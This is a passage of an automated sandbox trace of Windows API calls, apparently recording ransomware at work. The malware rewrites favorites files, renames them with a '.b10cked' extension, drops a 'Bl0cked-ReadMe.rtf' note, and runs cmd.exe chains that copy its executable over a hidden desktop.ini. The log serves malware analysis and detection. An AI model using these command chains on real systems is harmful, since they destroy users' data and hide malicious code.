(This=0x1d3df0, pszDir="%CD%") returned 0x0 [0211.690] ShellLink:IShellLinkW:SetIconLocation (This=0x1d3df0, pszIconPath="%SystemRoot%\\system32\\shell32.dll", iIcon=3) returned 0x0 [0211.690] ShellLink:IShellLinkW:SetShowCmd (This=0x1d3df0, iShowCmd=7) returned 0x0 [0211.690] ShellLink:IPersistFile:Save (This=0x1d3dfc, pszFileName="C:\\Users\\Default\\Favorites\\Links.lnk", fRemember=0) returned 0x0 [0211.697] ShellLink:IUnknown:Release (This=0x1d3dfc) returned 0x2 [0211.697] ShellLink:IUnknown:Release (This=0x1d3df0) returned 0x1 [0211.697] ShellLink:IUnknown:Release (This=0x1d3e18) returned 0x0 [0211.697] CoUninitialize () [0211.697] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0211.697] ReleaseMutex (hMutex=0xf8) returned 1 [0211.697] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0211.697] ReleaseMutex (hMutex=0xf8) returned 1 [0211.697] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0211.698] ReleaseMutex (hMutex=0xf8) returned 1 [0211.698] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0211.698] ReleaseMutex (hMutex=0xf8) returned 1 [0211.698] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie add-on site.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0211.699] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0211.699] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0211.699] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0211.700] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=26848874672) returned 1 [0211.700] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0211.700] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0211.700] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0211.700] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0211.700] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0211.700] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0211.700] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0211.700] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x85 [0211.700] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0211.700] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0211.700] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0211.700] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0211.700] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0211.700] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0211.700] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0211.700] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0211.700] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0211.700] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0211.700] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0211.700] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0211.700] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0211.700] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0211.701] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0211.701] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0211.701] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0211.701] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0211.701] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0211.701] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0211.701] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x85 [0211.701] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0211.701] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0211.701] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0211.701] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x85 [0211.701] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0211.701] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0211.701] ReadFile (in: hFile=0x120, lpBuffer=0x135adb8, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesRead=0x12ec08*=0x41, lpOverlapped=0x0) returned 1 [0211.702] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0211.702] WriteFile (in: hFile=0x120, lpBuffer=0x135adb8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesWritten=0x12ec1c*=0x41, lpOverlapped=0x0) returned 1 [0211.702] SetFilePointer (in: hFile=0x120, lDistanceToMove=-65, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x44 [0211.702] ReadFile (in: hFile=0x120, lpBuffer=0x135adb8, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesRead=0x12ec08*=0x41, lpOverlapped=0x0) returned 1 [0211.702] SetFilePointer (in: hFile=0x120, lDistanceToMove=-65, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x44 [0211.702] WriteFile (in: hFile=0x120, lpBuffer=0x135adb8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesWritten=0x12ec1c*=0x41, lpOverlapped=0x0) returned 1 [0211.706] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IE Add-on site.url", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0211.706] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IE Add-on site.url", cchWideChar=18, lpMultiByteStr=0x13286a4, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IE Add-on site.url", lpUsedDefaultChar=0x0) returned 18 [0211.707] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x85 [0211.707] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0211.707] CloseHandle (hObject=0x120) returned 1 [0211.707] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IEADD-~1.URL") returned 0x2f [0211.708] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\") returned 0x23 [0211.708] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IEADD-~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IE Add-on site.url.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IEADD-~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IE Add-on site.url.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0x9cc, dwThreadId=0xab8)) returned 1 [0211.710] CloseHandle (hObject=0x1b4) returned 1 [0211.710] CloseHandle (hObject=0x120) returned 1 [0211.710] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", cchLength=0x2e | out: lpsz="C:\\USERS\\DEFAULT\\FAVORITES\\MICROSOFT WEBSITES\\") returned 0x2e [0211.710] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\Favorites\\Links\\", cchLength=0x21 | out: lpsz="C:\\USERS\\DEFAULT\\FAVORITES\\LINKS\\") returned 0x21 [0211.710] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\DEFAULT\\FAVORITES\\MICROSOFT WEBSITES\\", cchCount1=46, lpString2="C:\\USERS\\DEFAULT\\FAVORITES\\LINKS\\", cchCount2=33) returned 3 [0211.710] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", cchLength=0x2e | out: lpsz="C:\\USERS\\DEFAULT\\FAVORITES\\MICROSOFT WEBSITES\\") returned 0x2e [0211.710] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0211.710] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\DEFAULT\\FAVORITES\\MICROSOFT WEBSITES\\", cchCount1=46, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 1 [0211.710] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0211.710] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0211.710] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0211.710] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\") returned 0x23 [0211.710] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0211.710] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0211.710] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x1b4, hThread=0x120, dwProcessId=0x248, dwThreadId=0x848)) returned 1 [0211.712] CloseHandle (hObject=0x1b4) returned 1 [0211.712] CloseHandle (hObject=0x120) returned 1 [0211.712] GetFileAttributesW (lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\bl0cked-readme.rtf")) returned 0xffffffff [0211.712] GetLastError () returned 0x2 [0211.712] CopyFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), lpNewFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\bl0cked-readme.rtf"), bFailIfExists=0) returned 1 [0211.714] GetFileAttributesW (lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\bl0cked-readme.rtf")) returned 0x20 [0211.714] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0211.714] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0211.718] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0211.718] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0211.718] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0211.719] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0x87 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0x87 [0211.719] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0211.719] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", lpszShortPath=0x123ffac, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\") returned 0x23 [0211.719] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0xb2 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0xb2 [0211.719] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0211.719] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Favorites\\Microsoft Websites", lpszShortPath=0x123fd6c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\FAVORI~1\\MICROS~1") returned 0x22 [0211.719] CharUpperBuffW (in: lpsz="attrib -r -s -h \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\desktop.ini\" & del /f /q \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\desktop.ini\" && attrib +h \"[TO_DIR]\"", cchLength=0x146 | out: lpsz="ATTRIB -R -S -H \"C:\\USERS\\DEFAULT\\FAVORI~1\\MICROS~1\\DESKTOP.INI\" & DEL /F /Q \"C:\\USERS\\DEFAULT\\FAVORI~1\\MICROS~1\\DESKTOP.INI\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\DEFAULT\\FAVORI~1\\MICROS~1\\DESKTOP.INI\" && ATTRIB +H \"C:\\USERS\\DEFAULT\\FAVORI~1\\MICROS~1\\DESKTOP.INI\" && ATTRIB +H \"[TO_DIR]\"") returned 0x146 [0211.719] CharUpperBuffW (in: lpsz="[TO_DIR]", cchLength=0x8 | out: lpsz="[TO_DIR]") returned 0x8 [0211.719] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\desktop.ini\" & del /f /q \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb88*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb78 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\desktop.ini\" & del /f /q \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\"", lpProcessInformation=0x12fb78*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xa50, dwThreadId=0x310)) returned 1 [0211.721] WaitForSingleObject (hHandle=0x120, dwMilliseconds=0xffffffff) returned 0x0 [0213.363] CloseHandle (hObject=0x120) returned 1 [0213.363] CloseHandle (hObject=0x1b4) returned 1 [0213.364] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0213.364] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0213.364] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0213.364] GetTickCount () returned 0x3bcc9 [0213.364] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbfc | out: lpPerformanceCount=0x12fbfc*=27015315854) returned 1 [0213.364] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x43\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0213.364] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x45\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0213.364] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x43\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0213.364] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x6f\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0213.364] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x49\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0213.364] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x46\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0213.364] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x37\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0213.364] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x47\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0213.364] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 